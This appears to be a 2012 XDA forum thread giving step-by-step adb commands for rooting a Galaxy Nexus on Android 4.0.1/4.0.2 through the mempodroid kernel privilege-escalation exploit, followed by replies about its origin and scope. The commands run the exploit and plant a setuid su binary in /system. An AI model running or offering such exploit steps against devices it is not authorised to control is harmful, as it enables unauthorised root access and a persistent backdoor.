Attend XDA's Second Annual Developer Conference, XDA:DevCon 2014!
5,771,909 Members 37,849 Now Online
XDA Developers Android and Mobile Development Forum

[HOW-TO] [GSM & CDMA] Root without Unlocking Bootloader via exploit (for 4.0.1/4.0.2)

Tip us?
 
efrant
Old
(Last edited by efrant; 15th July 2012 at 12:50 AM.)
#1  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 8044
Posts: 9,522
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Arrow [HOW-TO] [GSM & CDMA] Root without Unlocking Bootloader via exploit (for 4.0.1/4.0.2)

Edit: This does not works on anything newer than ICL53F (i.e., 4.0.2). It works fine on ITL41D (4.0.1), ITL41F (4.0.1) and ICL53F (4.0.2)

Once you have got root, you can now use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!

Disclaimer: I take no credit for this exploit or the implementation of it (but I will take credit for the step-by step ). Thanks to kendong2 for pointing it out to me here.

So, it looks like zx2c4 has found a local privilege escalation exploit. See source here, and saurik has managed to package it together for Android. See here. Although this may be old news to some, I hadn't seen it before.

So what does this all mean:
  • If you are running a 2.6.39 kernel (or above), which all Galaxy Nexus' are, you can now root your device without having to unlock your bootloader (and without losing your data).
  • Moreover, you should now be able to root your device even if your hardware buttons are not working.
  • Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.

Notes:
1) This assumes that you have USB Debugging enable on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
2) This needs to be done over ADB, as a terminal emulator on-device does not have the appropriate access. If you do not have ADB, I've attached it in the zip. Unzip all files.
3) Some users indicate that, once finished the procedure, they needed to open the Superuser app.

Step-by-step:
1) Download the attached files to your computer and unzip them in the same directory as your adb.exe file;
2) Open a command prompt in the same directory;
3) Copy the files to your device:

adb push mempodroid /data/local/tmp/mempodroid
adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk


4) Open a shell: adb shell
5) Change permission on mempodroid to allow it to run: chmod 777 /data/local/tmp/mempodroid
6) Run the exploit: ./data/local/tmp/mempodroid 0xd7f4 0xad4b sh

Note: Once you do step 6, your prompt should change from $ to #. If not, it did not work.

7) Mount the system partition as rw: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
8) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
9) Change permissions on su: chmod 06755 /system/bin/su
10) Copy Superuser.apk: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
11) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
12) Mount the system partition as r/o: mount -o remount,ro -t ext4 /dev/block/mmcblk0p1 /system
13) Rescind root: exit
14) Exit the ADB shell: exit
15) Done. You now should have root without having to unlock your bootloader.
Attached Files
File Type: zip Root-locked-GN.zip - [Click for QR Code] (479.8 KB, 1767 views)
File Type: zip platform-tools-v19.zip - [Click for QR Code] (661.9 KB, 1276 views)
At present, I am not readily available on the forums or via PM -- if you are in need of a moderator, please contact someone from this list.

I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
The Following 30 Users Say Thank You to efrant For This Useful Post: [ Click to Expand ]
 
efrant
Old
(Last edited by KennyG123; 19th September 2012 at 05:11 PM.)
#2  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 8044
Posts: 9,522
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Reserved
At present, I am not readily available on the forums or via PM -- if you are in need of a moderator, please contact someone from this list.

I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
 
efrant
Old
(Last edited by KennyG123; 19th September 2012 at 05:12 PM.)
#3  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 8044
Posts: 9,522
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Reserved
At present, I am not readily available on the forums or via PM -- if you are in need of a moderator, please contact someone from this list.

I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
 
times_infinity
Old
#4  
times_infinity's Avatar
Senior Member
Thanks Meter 1598
Posts: 1,504
Join Date: Oct 2010
This is the same as https://github.com/saurik/mempodroid

saurik ftw.
. . .


Twitter: @times_infinity

Synacking
Akaineing

Lurk, Learn, and STFU
RTFM

ShadowFall
If you like what I do or have helped you in any way why not buy me some pizza?
 
efrant
Old
#5  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 8044
Posts: 9,522
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Quote:
Originally Posted by times_infinity View Post
This is the same as https://github.com/saurik/mempodroid

saurik ftw.
Not sure what you are getting at? I mentioned saurik in the first post, and the link you posted is in the first post. And I mentioned that this may be old news, but I haven't seen it anywhere before today in the GN forums.
At present, I am not readily available on the forums or via PM -- if you are in need of a moderator, please contact someone from this list.

I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
 
Sleuth255
Old
#6  
Sleuth255's Avatar
Retired Senior Moderator
Thanks Meter 39
Posts: 3,543
Join Date: Mar 2006
Location: Milwaukee
Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!



ROM: rooted/deodexed 4.1.1 (JRO03O)
Kernel: Franco Dailies: r295
Baseband: FF02/FG02
Follow my Ramblings: blog.kwilcox.org
 
renaud
Old
#7  
renaud's Avatar
Recognized Developer
Thanks Meter 2226
Posts: 2,322
Join Date: Aug 2010
Location: Braine-l'Alleud

 
DONATE TO ME
Quote:
Originally Posted by Sleuth255 View Post
Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!
You need ics to have a vulnerable kernel version, so given the number of devices which currently have ics officially, I doubt it will be common. I'd also expect Google and vendors to correct this in next release.

Also many custom kernels don't have this flaw as they are at or over 3.0.18 or have patched it. This prevents gaining unnoticed root.

Sent from my Galaxy Nexus
I gave up the idea of a useful signature
 
Sleuth255
Old
#8  
Sleuth255's Avatar
Retired Senior Moderator
Thanks Meter 39
Posts: 3,543
Join Date: Mar 2006
Location: Milwaukee
Hmmm I thought 2.6.39 was found in GB builds. This exploit is almost a root fix for the Moto DX 4.5.621 fiasco. Unfortunately the kernel for that build is 2.6.32.9.

Sent from my Galaxy Nexus using xda premium



ROM: rooted/deodexed 4.1.1 (JRO03O)
Kernel: Franco Dailies: r295
Baseband: FF02/FG02
Follow my Ramblings: blog.kwilcox.org
 
jaykruer
Old
#9  
Senior Member
Thanks Meter 11
Posts: 258
Join Date: Aug 2010
This was huge in the headlines a few weeks back. It's nice to see someone putting it to a good use!

Sent from my Galaxy Nexus using xda premium
 
Huxleysäl
Old
#10  
Junior Member
Thanks Meter 0
Posts: 7
Join Date: Mar 2012
Hi, been lurking awhile, registered to clear up somethings.

I did some research while attempting to access the /data/local/ -folder with terminal emulator and I found that it would be impossible to write or to find it while being unrooted. Rooting a phone through using an unrooted access root seems impossible.

Did I miss something or is there any other way to copy mempodroid to the data- folder? I sure would like to keep all my files.

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes